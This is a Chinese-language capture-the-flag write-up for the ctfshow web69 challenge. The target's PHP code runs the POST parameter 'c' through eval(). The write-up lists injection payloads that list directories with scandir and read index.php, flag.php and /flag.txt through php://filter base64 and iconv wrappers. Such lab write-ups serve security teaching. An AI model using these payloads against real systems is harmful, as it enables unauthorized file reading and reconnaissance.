[ctfshow web入门] web69

信息收集

使用c=include("php://filter/convert.base64-encode/resource=index.php");读取的index.php

php 复制代码
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

解题

查目录

百度了一下有哪些打印函数,var_export能用

  • var_export() 函数输出或返回有关变量的结构化信息。
    该函数的工作方式与 var_dump() 类似,不同之处在于该函数的返回值是有效的 PHP 代码。
php 复制代码
c=var_export(scandir('.'));

或者换一个思路,用一个函数把array 转成字符串 ,因为我发现printecho没被禁用

php 复制代码
c=echo(implode(', ', scandir('.')));
c=print(join(', ', scandir('.')));

implode(separator,array):implode函数返回一个由数组元素组合成的字符串。

join(separator,array):join函数是implode函数的别名。


读文件

flag不在flag.php,和之前一样,不是本篇重点,不再截图

php 复制代码
c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");
c=include("php://filter/convert.base64-encode/resource=flag.php");
php 复制代码
c=var_export(scandir('/'));
c=echo(implode(', ', scandir('/')));
c=print(join(', ', scandir('/')));
php 复制代码
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");
c=include("php://filter/convert.base64-encode/resource=/flag.txt");
c=include("/flag.txt");

web68    目录    web70

相关推荐
DianSan_ERP13 分钟前
电商架构演进:如何在高并发场景下实现多平台API的标准化履约?
运维·前端·网络·安全·架构·自动化
碎_浪3 小时前
给键盘党的英语记忆工具:我做了一款「打字背单词」桌面应用
前端·程序员·ai编程
阿成学长_Cain4 小时前
Linux dirs命令详解|Bash目录堆栈管理快速切换目录实战教程
linux·运维·前端·数据库
yqcoder4 小时前
httpOnly 是什么,又有什么用?
开发语言·前端·javascript
IT_陈寒5 小时前
Java的Stream.parallel()把我CPU跑爆了,这种优化要谨慎
前端·人工智能·后端
小皮虾5 小时前
小程序首页性能优化实战:从 4 秒到 1.8 秒
前端·微信小程序
山河木马5 小时前
GPU自动处理专题1-裁剪到底在裁什么(裁剪)
前端·webgl·计算机图形学
奔跑的蜗牛ing5 小时前
CentOS Nginx 安装与静态文件服务器配置指南
前端·面试·架构
子兮曰5 小时前
Bun 重写为 Rust:11天、64个Claude、16.5万美元,一次改变行业认知的激进实验
前端·后端·bun